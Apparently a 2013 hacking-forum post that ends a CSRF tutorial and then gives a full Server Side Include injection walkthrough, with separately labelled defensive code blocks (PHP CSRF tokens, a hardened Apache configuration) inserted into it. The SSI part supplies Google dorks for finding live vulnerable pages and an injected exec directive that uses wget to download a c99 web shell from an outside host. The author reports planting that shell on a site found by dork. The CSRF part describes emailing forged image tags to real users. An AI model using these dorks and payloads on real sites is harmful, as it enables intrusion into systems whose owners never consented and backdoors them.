    Now I have the e-mail addresses of the users, and I can send them e-mails containing the img tag; when they open it while logged in, the home page/website address field in their profile will change to http://www.ponizSite.com.

    How to prevent?

    There are not many airtight, well-known solutions for preventing CSRF attacks, except for one: tokens.
    What is a token? It is a hidden, random, unguessable value tied to the user's session that must accompany every form that changes data, such as login forms or the forms that let registered users update their details or home page (as in our case).

    PHP Code:
    <input type="hidden" name="token" value="8pssf18ssdmf8s7p80fodi" id="token" /> 

    Because the token is stored server-side and compared on every submission, the attacker cannot know the victim's token: his page cannot read the target site's HTML (the same-origin policy forbids it), and the token is regenerated per session, or on every page load for extra safety, so guessing it is hopeless.

    Tips :

    • Don't forget to log out and delete your cookies when you are done with a site; no session, no CSRF.
    • Use tokens (a CAPTCHA on sensitive actions is safer still).
    • When you build your PHP site, do not read state-changing parameters from the GET or REQUEST super-globals; accept them from POST only. Note that POST on its own does not stop CSRF (an auto-submitting hidden form works just as well as an image tag), so the token is still needed.
    Bypassing tokens is easy (at least for me)... but I have given you the most widely used solution.
    My solution is to build a captcha system based on sessions... :3
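Added example, not the post's own code: a session-bound token of the kind described above, wired into a handler like the users.php/change_password.php pages used in the attack. The field name, the handler name and PHP 7.0 or newer are assumptions.

```php
<?php
// Added example, not from the original post. Field and handler names
// are assumptions.
session_start();

// Issue (or reuse) a per-session token: 32 random bytes, hex-encoded.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field that goes into every state-changing form.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Verify: the token must come from the POST body (never $_GET or
// $_REQUEST) and is compared in constant time with hash_equals().
function csrf_verify(): bool
{
    $sent     = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    // is_string() guards against csrf_token[]=x turning $sent into an array.
    return $expected !== '' && is_string($sent) && hash_equals($expected, $sent);
}

// users.php sketch: GET only renders the form, POST is the only method
// that changes anything, and a bad token is refused before any update.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_verify()) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // ... safe to update the logged-in user's profile from $_POST['webaddress'] ...
    echo 'Profile updated';
} else {
    echo '<form method="post" action="users.php">'
        . csrf_field()
        . '<input name="webaddress"> <button>Save</button></form>';
}
```

Against this handler the img and iframe payloads fail twice over: a GET never reaches the update code, and a forged POST from another origin cannot carry the token because the attacker's page cannot read it. Marking the session cookie SameSite=Lax or Strict is a cheap extra layer; an XSS on the same origin still defeats both, as the note at the end of this post points out.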

    Well...I'm done (:

    Thanks viewing my thread and I hope you learned something ! 

    Note: When a site has an XSS, it is a great injection point for CSRF, because script running on the target origin can read the token and submit the form itself. But XSS is not required: you can launch a CSRF attack on the target site even from your own localhost; it's all about the HTTP requests.

    Server Side Include Injection(SSI Injection)

  • by
  • Maya Badmash

  • Part 1 - Server Side Includes && General background.

    Server Side Includes
    (SSI) is a simple server-side scripting language for web pages, designed to make static HTML pages a little more dynamic. SSI lets plain HTML pages behave a little like applications written in ASP, PHP and similar languages by inserting dynamic information from the server into the page before it is sent.

    HTML pages with SSI directives usually have the extension shtml or shtm. On IIS the extension stm is also possible.

    The most common use of SSI is including the contents of other files on the web server into a page.
    SSI directives must be wrapped in <!--# and --> (so they look like HTML comments to anything that does not process SSI).
    The syntax of an SSI directive is usually:
    <!--#function_name parameter="value" -->

    Live example: 
    Anyone who knows PHP can see that the following two snippets do the same thing:
    With PHP :

    PHP Code:
    <?php
    include('head.txt');
    ?>

    With SSI :

    Code:
    <!--#include virtual="head.txt" --> 

    So here are the most common functions/directives in SSI :

    • echo 
      Parameters: var.
      Uses: prints the contents of a CGI/HTTP environment variable, such as HTTP_ACCEPT, LAST_MODIFIED or HTTP_USER_AGENT.
      Example :
      Code:
      <!--#echo var="REMOTE_ADDR" --> 
      ~
    • include
      Parameters: virtual\file
      Uses: includes another file. virtual takes a URL path relative to the site; file takes a path relative to the current document's directory.
      Example:
      Code:
      <!--#include virtual="file.html" --> 
      Another option, with the file parameter:
      Code:
      <!--#include file="file.html" --> 
      ~
    • exec
      Parameters: cmd\cgi
      Uses: executes a script, shell command or program on the server, as the user the web server runs as. The cmd parameter holds a shell command; the cgi parameter holds the path to a CGI script. This is the directive that turns an SSI injection into remote code execution, and the one administrators disable with Options IncludesNOEXEC.
      Example:
      To run a CGI script:
      Code:
      <!--#exec cgi="/cgi-bin/any_script.cgi" --> 
      To execute a shell command:
      Code:
      <!--#exec cmd="ls -A" --> 

    Part 2 - Exploiting.

    So... here the fun part begins :3
    As I said in the first part, the most common extension for HTML pages that use Server Side Includes is shtml.
    So we'll use this dork :

    Code:
    inurl:login.shtml

    I found this page and entered my username as Sylar:
    [Image: Fw7qE.png]

    We can see in the image above that the username we entered is displayed on the screen after we send the data, and the page has the shtml extension. The server evaluates SSI directives after our input has been written into the page, so what do you think will happen if we enter our username as :

    Code:
    <!--#echo var="HTTP_USER_AGENT" --> 

    And guess what our output is?
    [Image: 8oms4.png]
    Voilà :>

    Now we'll try to enter the following code as the username:

    Code:
    <!--#exec cmd="wget http://www.sh3ll.org/c99.txt? -O shell.php" --> 

    Our output:

    [Image: VDc9n.png]

    The command executed successfully.

    Now let's check whether our shell was uploaded :

    [Image: 4a7bR.png]
    Yes, it was :3
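As an added example, not part of the original post, here is the Apache httpd configuration behind the two behaviours seen above: the permissive setting that lets an injected <!--#exec --> run shell commands, and the hardened setting that keeps SSI pages working but disables exec. The directory path is an assumption.

```apache
# Added example (not from the original post). The directory path is an
# assumption; the directives are standard mod_include settings.

# WEAK: plain Includes enables every SSI directive, including
# <!--#exec cmd="..." -->, so reflected input that contains an SSI
# directive runs shell commands as the httpd user. Shown commented out
# so it does not conflict with the hardened block below.
#<Directory "/var/www/html">
#    Options +Includes
#    AddType text/html .shtml
#    AddOutputFilter INCLUDES .shtml
#</Directory>

# HARDENED: IncludesNOEXEC keeps echo and include working for the .shtml
# pages but disables exec cmd and exec cgi, so the wget payload above
# leaves an "[an error occurred while processing this directive]" string
# in the page instead of a shell on disk.
<Directory "/var/www/html">
    Options +IncludesNOEXEC
    AddType text/html .shtml
    AddOutputFilter INCLUDES .shtml
    # Do not let a per-directory .htaccess switch exec back on.
    AllowOverride None
</Directory>
```

IncludesNOEXEC only limits the blast radius: echo of environment variables and include of files on the server still work, so the real fix is to HTML-encode user input (turning < into &lt;) before it is written into any SSI-parsed page, which stops the directive from forming at all.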

    Dorks

    inurl:bin/Cklb/ - Best Dork
    inurl:login.shtml
    inurl:login.shtm
    inurl:login.stm
    inurl:search.shtml
    inurl:search.shtm
    inurl:search.stm
    inurl:forgot.shtml
    inurl:forgot.shtm
    inurl:forgot.stm
    inurl:register.shtml
    inurl:register.shtm
    inurl:register.stm
    inurl:login.shtml?page=

    Uhm... that's all (I think).
    Hope you guys learned something.
    Copyright (c) 2013 Edward Maya
    Sponsored By : Chris Defaulter Valentine